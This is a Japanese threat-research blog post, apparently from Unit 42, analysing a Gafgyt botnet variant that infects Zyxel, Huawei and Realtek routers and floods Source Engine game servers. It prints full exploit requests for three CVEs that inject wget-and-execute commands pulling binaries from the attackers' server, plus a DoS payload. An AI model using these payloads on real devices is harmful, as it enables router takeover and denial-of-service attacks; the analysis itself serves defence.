{"id":100731,"date":"2019-11-05T21:19:46","date_gmt":"2019-11-06T05:19:46","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=100731\/"},"modified":"2019-11-05T21:27:23","modified_gmt":"2019-11-06T05:27:23","slug":"home-small-office-wireless-routers-exploited-to-attack-gaming-servers","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","title":{"rendered":"Gafgyt: A Botnet That Infects Small Office\/Home Wireless LAN Routers and Attacks Game Servers"},"content":{"rendered":"<h2>Overview<\/h2>\n<p>In September 2019, Unit 42 (formerly Zingbox security research), the Palo Alto Networks threat intelligence research team, discovered a new variant of the Gafgyt botnet attempting to infect IoT devices during its routine proactive IoT threat hunting. This variant specifically tries to infect small office\/home wireless LAN routers from well-known manufacturers such as Zyxel, Huawei and Realtek, and it competes with another botnet, <a 
href=\"https:\/\/www.virustotal.com\/gui\/file\/04463cd1a961f7cd1b77fe6c9e9f5e18b34633f303949a0bb07282dedcd8e9dc\/details\"><em>JenX<\/em><\/a>. Both gain access through remote code execution exploits, recruit the routers into a botnet, and attack game servers (in particular servers running Valve's Source Engine), causing denial of service (DoS).<\/p>\n<p>The Gafgyt variant discovered this time also competes with similar botnets that have frequently been found for sale on Instagram. According to Shodan scans, more than 32,000 wireless routers worldwide, including in Japan, are potentially vulnerable to Gafgyt's exploits, and as shown below, Gafgyt exploits one more vulnerability than <em>JenX<\/em>.<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-18368\">CVE-2017-18368<\/a>: ZYXEL P660HN-T1A (vulnerability newly added in this Gafgyt variant)<\/li>\n<li><a 
href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a>: Huawei HG532 (vulnerability also exploited by <em>JenX<\/em>)<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>: Realtek RTL81XX Chipset (vulnerability also exploited by <em>JenX<\/em>)<\/li>\n<\/ul>\n<h4>Targeted IoT Devices: Small Office\/Home Wireless LAN Routers<\/h4>\n<p>Since 2016, wireless LAN routers, as one of the IoT devices most commonly present in organizations across every industry, have been targeted by IoT botnets. As a result, the production networks and IP address reputation of compromised companies have been observed to be degraded. In addition, botnets have emerged that gain access to IoT devices using exploits instead of the typical dictionary attack (an attack in which the botnet tries to log in to a device through an unsecured service such as telnet). Even if IoT device administrators have disabled unsecured services and applied strong login passwords, the use of such exploits makes it easier to expand a botnet through these IoT devices.<\/p>\n<p>Gafgyt is a botnet discovered in 2014 that came into wide use because it can launch large-scale DDoS (distributed denial-of-service) attacks. Since then it has evolved into many variants that target a wide range of devices across every industry. It is well known that there is a strong connection between botnets and game servers. <a href=\"https:\/\/blog.radware.com\/security\/2018\/02\/jenx-los-calvos-de-san-calvicie\/\">Radware<\/a> has already published a report on a similar variant called <em>JenX<\/em>, which exploits <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a> and <a 
href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>. These vulnerabilities exist in the Huawei HG532 and Realtek RTL81<em>XX<\/em> wireless LAN routers, respectively.<\/p>\n<p>Our research team found that the updated Gafgyt malware variant (SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07<\/span>) is derived from <em>JenX<\/em>. In addition, analysis of the sample showed that Gafgyt targets three wireless LAN router models, one more than the <em>JenX<\/em> malware it is based on.<\/p>\n<ul>\n<li>Zyxel P660HN-T1A: model added in Gafgyt<\/li>\n<li>Huawei HG532: same target model as <em>JenX<\/em><\/li>\n<li>Realtek RTL81<em>XX<\/em>: 
same target model as <em>JenX<\/em><\/li>\n<\/ul>\n<p>Gafgyt uses three \"scanners\" to try to exploit known remote code execution vulnerabilities in the three routers listed above. These scanners replace the typical dictionary attack commonly seen in other IoT botnets.<\/p>\n<figure id=\"attachment_100616\" aria-describedby=\"caption-attachment-100616\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100616 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png\" alt=\"Figure 1. Scanner functions found in the sample\" width=\"600\" height=\"64\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-1024x109.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-300x32.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-768x82.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-900x96.png 900w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample-370x39.png 370w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-1.-Scanner-functions-found-in-the-sample.png 1128w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100616\" class=\"wp-caption-text\">Figure 1. Scanner functions found in the sample<\/figcaption><\/figure>\n<p>Earlier Gafgyt variants also exploited wireless LAN router vulnerabilities, but this variant combines the following three specific exploits in a single sample.<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-18368\">CVE-2017-18368<\/a>: ZYXEL P660HN-T1A<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-17215\">CVE-2017-17215<\/a>: Huawei HG532<\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2014-8361\">CVE-2014-8361<\/a>: Realtek RTL81XX Chipset<\/li>\n<\/ul>\n<p>These exploits are written to act as binary droppers that fetch the corresponding binary from a malicious server according to the type of device being infected.<\/p>\n<h4><strong>Exploit 1: CVE-2017-18368 (for ZYXEL P660HN-T1A)<\/strong><\/h4>\n<p>The first exploit abuses a remote command injection vulnerability in the Zyxel 
P660HN wireless LAN router. This exploit was not used by the predecessor variant <em>JenX<\/em>. The Zyxel P660HN-T1A provided by TrueOnline has a command injection vulnerability in the function that forwards remote system logs, which can be accessed by unauthenticated users. The vulnerability is in the ViewLog.asp page and can be exploited through the <span style=\"font-family: 'courier new', courier, monospace;\">remote_host<\/span> parameter, as shown below.<\/p>\n<pre class=\"lang:default decode:true \">POST \/cgi-bin\/ViewLog.asp HTTP\/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: *\/*\r\nUser-Agent: Ankit\r\nContent-Length: 176\r\nContent-Type: application\/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&amp;remote_syslog_Flag=1&amp;RemoteSyslogSupported=1&amp;LogFlag=0&amp;remote_hos\r\nt=%3bcd+\/tmp;wget+http:\/\/185.172.110[.]224\/arm7;chmod+777+arm7;.\/arm7 \r\nzyxel;rm+-rf+arm7%3b%23&amp;remoteSubmit=Save<\/pre>\n<p>The payload is located in the <span style=\"font-family: 'courier new', courier, 
monospace;\">zyxelscanner_scanner_init()<\/span> function.<\/p>\n<figure id=\"attachment_100618\" aria-describedby=\"caption-attachment-100618\" style=\"width: 695px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100618 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png\" alt=\"Figure 2. Zyxel exploit found in zyxelscanner_scanner_init()\" width=\"695\" height=\"182\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init.png 695w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init-300x79.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-2.-Zyxel-exploit-found-in-zyxelscanner_scanner_init-370x97.png 370w\" sizes=\"(max-width: 695px) 100vw, 695px\" \/><\/a><figcaption id=\"caption-attachment-100618\" class=\"wp-caption-text\">Figure 2. Zyxel exploit found in zyxelscanner_scanner_init()<\/figcaption><\/figure>\n<h4><strong>Exploit 2: CVE-2017-17215 (for Huawei HG532)<\/strong><\/h4>\n<p>The second exploit abuses a remote code execution vulnerability found in the Huawei 
HG532 router. An attacker can launch the attack by sending malicious packets to 37215\/tcp. Successful exploitation can result in remote execution of arbitrary code.<\/p>\n<pre class=\"lang:default decode:true \">POST \/ctrlt\/DeviceUpgrade_1 HTTP\/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: *\/*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\",\r\nnonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"\/ctrlt\/DeviceUpgrade_1\", \r\nresponse=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, \r\ncnonce=\"248d1a2560100669\"\r\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;s:Envelope xmlns:s=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\" \r\ns:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\"&gt;&lt;s:Body&gt;&lt;u:Upgrade \r\nxmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"&gt;&lt;NewStatusURL&gt;$(\/bin\/busybox \r\nwget -g 185.172.110[.]224 -l \r\n\/tmp\/mips -r \/mips; \/bin\/busybox chmod 777 * \/tmp\/mips; \/tmp\/mips \r\nhuawei)&lt;\/NewStatusURL&gt;&lt;NewDownloadURL&gt;$(echo HUAWEIUPNP)&lt;\/NewDownloadURL&gt;&lt;\/u:Upgrade&gt;&lt;\/s:Body&gt;&lt;\/s:Envelope&gt;<\/pre>\n<p>The exploit can be seen in the <span style=\"font-family: 'courier new', courier, 
monospace;\">huaweiscanner_scanner_init()<\/span> function.<\/p>\n<figure id=\"attachment_100621\" aria-describedby=\"caption-attachment-100621\" style=\"width: 664px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100621 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png\" alt=\"Figure 3. Huawei exploit found in huaweiscanner_scanner_init()\" width=\"664\" height=\"264\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init.png 664w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init-300x119.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-3.-Huawei-exploit-found-on-huaweiscanner_scanner_init-370x147.png 370w\" sizes=\"(max-width: 664px) 100vw, 664px\" \/><\/a><figcaption id=\"caption-attachment-100621\" class=\"wp-caption-text\">Figure 3. Huawei exploit found in huaweiscanner_scanner_init()<\/figcaption><\/figure>\n<h4><strong>Exploit 3: CVE-2014-8361 (for Realtek RTL81XX 
Chipset)<\/strong><\/h4>\n<p>The third exploit targets a serious flaw reported in 2014 in some Realtek routers that can lead to remote code execution. The cause lies in the miniigd SOAP service implemented by the Realtek SDK. Successful exploitation allows a remote attacker to execute arbitrary code through a crafted <span style=\"font-family: 'courier new', courier, monospace;\"><em>NewInternalClient<\/em><\/span> request.<\/p>\n<p><img width=\"700\" height=\"323\"  class=\"wp-image-100583 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42.png 700w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42-300x138.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/word-image-42-370x171.png 370w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><\/p>\n<p>This third exploit is found in the <span style=\"font-family: 'courier new', courier, monospace;\">realtekscanner_scanner_init()<\/span> function.<\/p>\n<figure id=\"attachment_100626\" aria-describedby=\"caption-attachment-100626\" style=\"width: 
709px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100626 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png\" alt=\"Figure 4. Realtek exploit found in realtekscanner_scanner_init()\" width=\"709\" height=\"303\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png 709w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1-300x128.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1-370x158.png 370w\" sizes=\"(max-width: 709px) 100vw, 709px\" \/><\/a><figcaption id=\"caption-attachment-100626\" class=\"wp-caption-text\">Figure 4. Realtek exploit found in realtekscanner_scanner_init()<\/figcaption><\/figure>\n<h4>Infection<\/h4>\n<p>This <em>JenX<\/em> 
variant uses the scanner functions described above to find machines to infect, then uses wget (a computer program that retrieves content from web servers) to download an ARM7 or MIPS binary depending on the type of machine found.<\/p>\n<p><figure id=\"attachment_100628\" aria-describedby=\"caption-attachment-100628\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100629 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png\" alt=\"Figure 5. 185.172.110[.]224\/mips and 185.172.110[.]224\/arm7 used to drop the binaries\" width=\"600\" height=\"91\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png 669w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7-300x46.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7-370x56.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100628\" class=\"wp-caption-text\">Figure 5. 
185.172.110[.]224\/mips and 185.172.110[.]224\/arm7 used to drop the binaries<\/figcaption><\/figure>Once it starts running on the compromised device, the malware connects to the C2 server, which is also the binary dropper server, sends device information, and joins the botnet.<\/p>\n<p><figure id=\"attachment_100634\" aria-describedby=\"caption-attachment-100634\" style=\"width: 732px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100634 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png\" alt=\"Figure 6. Connecting to the C2 server running at 185.172.110[.]224 on 993\/tcp\" width=\"732\" height=\"138\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png 732w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1-300x57.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1-370x70.png 370w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><\/a><figcaption id=\"caption-attachment-100634\" class=\"wp-caption-text\">Figure 6. 
Connecting to the C2 server running at 185.172.110[.]224 on 993\/tcp<\/figcaption><\/figure>At this point the infected device sends information about itself, such as its IP address and architecture, to the C2 server. If no name was passed to the malware as an argument, the infected device is given the name <em>Unknown<\/em>. The C2 server then responds with a <em>PING<\/em> command.<\/p>\n<figure id=\"attachment_100636\" aria-describedby=\"caption-attachment-100636\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100637 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png\" alt=\"Figure 7. Assigning a name to the device joining the botnet\" width=\"600\" height=\"378\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png 544w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet-300x189.png 300w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet-370x233.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100636\" class=\"wp-caption-text\">\u56f37 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3059\u308b\u30c7\u30d0\u30a4\u30b9\u306b\u540d\u524d\u3092\u5272\u308a\u5f53\u3066\u308b<\/figcaption><\/figure>\n<figure id=\"attachment_100638\" aria-describedby=\"caption-attachment-100638\" style=\"width: 742px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100638 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png\" alt=\"\u56f37 C2\u304b\u3089\u306e\u5fdc\u7b54\" width=\"742\" height=\"185\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png 742w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response-300x75.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response-370x92.png 370w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/a><figcaption id=\"caption-attachment-100638\" class=\"wp-caption-text\">\u56f37 
C2\u304b\u3089\u306e\u5fdc\u7b54<\/figcaption><\/figure>\n<p>\u30c7\u30d0\u30a4\u30b9\u304c\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3059\u308b\u3068\u3001\u3055\u307e\u3056\u307e\u306a\u7a2e\u985e\u306eDoS\u653b\u6483\u3092\u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9\u306e\u53d7\u4fe1\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306b\u3064\u3044\u3066\u6b21\u7bc0\u4ee5\u964d\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h4>DoS\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3<\/h4>\n<p>\u3053\u306eGafgyt\u4e9c\u7a2e\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u53d7\u4fe1\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306b\u5fdc\u3058\u3001\u3055\u307e\u3056\u307e\u306aDoS\u653b\u6483\u3092\u540c\u6642\u306b\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306e<span style=\"font-family: 'courier new', courier, monospace;\">main()<\/span>\u95a2\u6570\u306f\u5225\u306e\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">processCmd()<\/span>\u3092\u547c\u3073\u51fa\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u51e6\u7406\u3057\u3001\u5bfe\u5fdc\u3059\u308b\u653b\u6483\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u4ee5\u4e0b\u306f\u3001\u7279\u5b9a\u3055\u308c\u305f\u91cd\u8981\u306a\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u4e00\u90e8\u3067\u3059\u3002<\/p>\n<ul>\n<li>HTTP: <span style=\"font-family: 'courier new', courier, 
SendHTTP()<\/span>">
monospace;\">SendHTTP()<\/span> is called to launch an HTTP flood attack. The function takes six parameters for the attack (HTTP method, target host, port, file path, end time, and repeat count). It also carries out the attack using one of the User-Agents defined in the program, chosen at random.<\/li>\n<li>HTTPHex: An attack option similar to HTTP that calls the <span style=\"font-family: 'courier new', courier, monospace;\">SendHTTPHex()<\/span> function. <span style=\"font-family: 'courier new', courier, monospace;\">SendHTTPHex()<\/span> takes the same parameters as <span style=\"font-family: 'courier new', courier, monospace;\">SendHTTP()<\/span>, but instead of a normal file path (such as \/index.html) it uses a hexadecimal array filled with junk data, in an attempt to consume and exhaust resources on the server.<\/li>\n<li>HTTPCF: Attacks services protected by Cloudflare.<\/li>\n<li>KILLER &amp; KILLATTK: 
Removes any competing botnet that is already present on the infected device.<\/li>\n<li>VSE: Contains a payload for attacking game servers running Valve's Source Engine.<\/li>\n<\/ul>\n<figure id=\"attachment_100643\" aria-describedby=\"caption-attachment-100643\" style=\"width: 740px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100643 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png\" alt=\"Figure 8 The most notable commands in this Gafgyt variant\" width=\"740\" height=\"156\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png 740w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-300x63.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-370x78.png 370w\" sizes=\"(max-width: 740px) 100vw, 740px\" \/><\/a><figcaption id=\"caption-attachment-100643\" class=\"wp-caption-text\">Figure 8 The most notable commands in this Gafgyt variant<\/figcaption><\/figure>\n<h4>The Gaming Industry Is Still a Target<\/h4>\n<p>As mentioned above, the <em>VSE<\/em> command launches an attack against game servers that run Valve's Source Engine. Games that use the Source Engine include <em>Half-Life<\/em> and <em>Team Fortress 2<\/em>. Note that this is not an attack on Valve Corporation itself. Anyone can run a Source Engine game server on their own network, and the attack option described here targets those servers. The following is the payload used to attack game servers running the Source Engine.<\/p>\n<pre class=\"lang:default decode:true\">TSource Engine Query + \r\n\/x54\/x53\/x6f\/x75\/x72\/x63\/x65\/x20\/x45\/x6e\/x67\/x69\/x6e\/x65\/x20\/x51\/\r\nx75\/x65\/x72\/x79 rfdknjms<\/pre>\n<p>The payload decodes to the following.<\/p>\n<figure id=\"attachment_100645\" aria-describedby=\"caption-attachment-100645\" style=\"width: 740px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100645 size-full lozad\"  
data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png\" alt=\"\u56f39 \u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fTSource Engine Query\u306e\u30da\u30a4\u30ed\u30fc\u30c9\" width=\"740\" height=\"156\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png 740w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1-300x63.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1-370x78.png 370w\" sizes=\"(max-width: 740px) 100vw, 740px\" \/><\/a><figcaption id=\"caption-attachment-100645\" class=\"wp-caption-text\">\u56f39 \u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fTSource Engine Query\u306e\u30da\u30a4\u30ed\u30fc\u30c9<\/figcaption><\/figure>\n<p>\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fDoS\u30ea\u30d5\u30ec\u30af\u30b7\u30e7\u30f3\u653b\u6483\uff08DRDoS\uff09\u3092\u5f15\u304d\u8d77\u3053\u3059\u305f\u3081\u306b\u3088\u304f\u5229\u7528\u3055\u308c\u308b\u3082\u306e\u3067\u3001DRDoS\u653b\u6483\u3067\u306f\u3001\u8907\u6570\u306e\u611f\u67d3\u30de\u30b7\u30f3\u3092\u610f\u56f3\u305b\u305aDDoS\u653b\u6483\u306b\u53c2\u52a0\u3055\u305b\u307e\u3059\u3002<em>Source Engine 
Query<\/em>\u3068\u3044\u3046\u306e\u306f\u3001Valve\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u4f7f\u7528\u3059\u308b\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\/\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u9593\u3067\u3084\u308a\u53d6\u308a\u3055\u308c\u308b\u5b9a\u671f\u7684\u901a\u4fe1\u306e1\u3064\u3067\u3059\u3002\u611f\u67d3\u30db\u30b9\u30c8\u30de\u30b7\u30f3\u3078\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u611f\u67d3\u30db\u30b9\u30c8\u304b\u3089\u30bf\u30fc\u30b2\u30c3\u30c8\u30db\u30b9\u30c8\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\uff08\u30ea\u30d5\u30ec\u30af\u30c8\uff09\u3055\u308c\u3001\u3053\u306e\u7d50\u679c\u3001\u653b\u6483\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u91cf\u304c\u5897\u5e45\u3055\u308c\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u30db\u30b9\u30c8\u306b\u5bfe\u3059\u308b\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u653b\u6483\u304c\u767a\u751f\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u307b\u304b\u3001VSE\u4ee5\u5916\u306eDoS\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3001\u653b\u6483\u8005\u306f\u4ed6\u306b\u3082Fortnite\u306a\u3069\u5e83\u304f\u30d7\u30ec\u30a4\u3055\u308c\u3066\u3044\u308b\u30b2\u30fc\u30